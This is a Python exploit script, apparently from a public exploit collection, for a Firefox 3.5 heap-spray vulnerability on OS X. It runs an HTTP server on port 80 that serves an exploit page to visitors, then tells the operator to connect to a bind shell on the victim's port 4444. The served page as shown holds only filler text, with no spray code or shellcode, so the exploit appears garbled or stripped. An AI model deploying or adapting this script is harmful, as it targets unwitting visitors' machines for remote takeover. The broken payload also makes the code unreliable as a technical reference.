#!/usr/bin/env python ####################################################### # # FireFox 3.5 Heap Spray OS X Exploit # Modified by: Dr_IDE # Originally Discovered by: Simon Berry-Bryne # Pythonized by: David Kennedy (ReL1K) @ SecureState # Thanks to HDM # Tested on OS X 10.5.7 # ####################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys class myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write(""" Firefox 3.5 Vulnerability Firefox 3.5 Heap Spray Exploit for OSX
Mozilla, We have a problem. Bind Shell Delivered on Port: 4444

Ihazacrashihazacrash

Ohnoesihazacrashhazcrash

Aaaaahhhhh

""") print ("\n\n[*] Exploit Sent. [*]\n[*] Wait about 15 seconds and attempt to connect.[*]\n[*] Connect to IP Address: %s and port 4444 [-]" % (target)) def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() httpd = HTTPServer(('', 80), myRequestHandler) print (""" ####################################################### # # FireFox 3.5 Heap Spray OS X Exploit # Modified by: Dr_IDE # Originally discovered by: Simon Berry-Bryne # Pythonized: David Kennedy (ReL1K) @ SecureState # Thanks to HDM # Tested on OS X 10.5.7 # ####################################################### """) print ("Listening on port 80.") print ("Have someone connect to you.") print ("\nType -c to exit..") try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print ("\n\n[*] Exiting Exploit.\n\n") sys.exit(1)